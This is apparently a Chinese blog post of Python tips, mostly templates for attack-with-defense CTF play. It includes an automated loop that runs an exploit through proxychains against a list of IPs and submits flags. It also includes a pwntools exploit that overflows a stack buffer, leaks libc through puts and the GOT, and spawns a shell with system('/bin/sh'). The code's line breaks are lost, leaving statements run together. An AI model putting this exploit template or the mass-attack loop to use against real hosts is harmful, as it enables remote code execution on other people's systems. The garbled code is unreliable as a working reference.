python使用技巧

1 使用colorama库带颜色输出日志

#!/usr/bin/env python #encoding: utf-8from colorama import init, Fore, Back, Styleif __name__ == "__main__":init(autoreset=True)#初始化,并且设置颜色设置自动恢复 print(Fore.RED + 'some red text') print(Back.GREEN + 'and with a green background') print(Style.DIM + 'and in dim text') # 如果未设置autoreset=True,需要使用如下代码重置终端颜色为初始设置 #print(Fore.RESET + Back.RESET + Style.RESET_ALL)autoreset=True print('back to normal now')

2 pwn awd模板 awd模式千万不要使得单个脚本功能太过庞大,脚本很容易出现问题,而且调试起来很麻烦,建议将flag提交脚本和exp实现脚本分开,下面提供简单模板:
【python使用技巧】flag提交
#coding:utf-8 import re import os import requests from colorama import init, Fore, Back, Style import timeinit(autoreset=True)isSubmit = Falsedef searchflag(str1): pattern = "(\w+-)+\w+" m = re.search(pattern,str1) return mdef exp(ip,token): cmd = "proxychains python {src} {ip} {token}".format(src = "https://www.it610.com/article/exp.py",ip = ip,token = token) os.system(cmd)''' def get_token(): with open("token.txt") as f: a=f.read() return a '''def login(username,password): passdefsubmit(flag): passdef do(ip): token = get_token() try: exp(ip,token) print(Fore.GREEN+"[+]success link! :ip-> {ip} ,token-> {token}".format(ip = ip,token =token)) if isSubmit: with open("flag","r") as f: flag = f.read().strip() submit(flag) except Exception as e: print(Back.RED+"error:" + ip +"\n" +repr(e)) #raise eiplist = [] import timeif __name__ =="__main__": while True: for ip in iplist: do(ip) t = time.strftime("%H:%M:%S",time.localtime()) print(Back.YELLOW + "nowtime : {t}".format(t= t)) hour = t.split(":")[0] if int(hour) >= 9: break time.sleep(8*60)

exp书写格式:
#coding:utf-8from pwn import * import sys import re from colorama import init, Fore, Back, Styleinit(autoreset=True)debug = Falsedef searchflag(str1): pattern = "(\w+-)+\w+" m = re.search(pattern,str1) return mif debug: context(arch="x86_64",os = "linux",log_level="debug") p = process("./3pwn") else: ip = sys.argv[1] token = sys.argv[2] context(arch="x86_64",os = "linux",timeout = 20) p = remote(ip, 9999)#pwnlib.gdb.attach(proc.pidof(p)[0])elf = ELF("./king-of-glory")libc = ELF("libc.so")def buy_medicine(): p.sendline("4") p.sendline("1") p.recvuntil("want: ") p.sendline("9"*16) p.sendline("4") p.sendline("1") p.recvuntil("want: ") p.sendline("9"*16) p.sendline("4") p.sendline("1") p.recvuntil("want: ") p.sendline("9"*16) p.sendline("4") p.sendline("1") p.recvuntil("want: ") p.sendline("9"*16) p.sendline("3") p.recv()buy_medicine()def UnlimiedMoneyWorks(idx): p.sendline("9") p.recvuntil("name?\n") p.sendline("a"*69) #p.sendline(name) p.recv() p.sendline(idx)vul_addr = 0x400B88pop_rdi_ret = 0x0000000000401403 payload = "a"*0xB0 + p64(0xdeadbeef) payload+=p64(pop_rdi_ret)+p64(elf.got["puts"]) +p64(elf.sym["puts"])+p64(vul_addr) UnlimiedMoneyWorks(payload)def get_addr(): return u64(p.recvuntil("\x7f")[-6:].ljust(8,"\0"))libc_puts = get_addr() libc_base = libc_puts - libc.sym["puts"] #success("libc_puts -> {:#x}".format(libc_puts)) #success("libc_base -> {:#x}".format(libc_base))libc_system = libc_base + libc.sym["system"] libc_binsh = libc_base + libc.search("/bin/sh").next() #success("libc_system -> {:#x}".format(libc_system)) #success("libc_binsh -> {:#x}".format(libc_binsh))payload = "a"*0xB0 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(libc_binsh)+p64(libc_system) p.sendline(payload) p.recv() #p.sendline("cat flag.txt") p.sendline("\ngetflag") flag = p.recv() m = searchflag(flag) if m: flag = m.group() success(Back.GREEN +"ip -> {ip},token -> {token},flag -> {flag} ".format(ip =ip,token = token,flag = flag))#cmd = "echo {0} >>token".format(token) cmd = "hereiam -t {token}".format(token = token) p.sendline(cmd) p.sendline("exit") #p.send("\n\n") p.close() with open("flag","w") as f: f.write(flag) else: print(Back.RED+"[-] failed!!! can't get flag from {0}".format(ip)) p.close()

    推荐阅读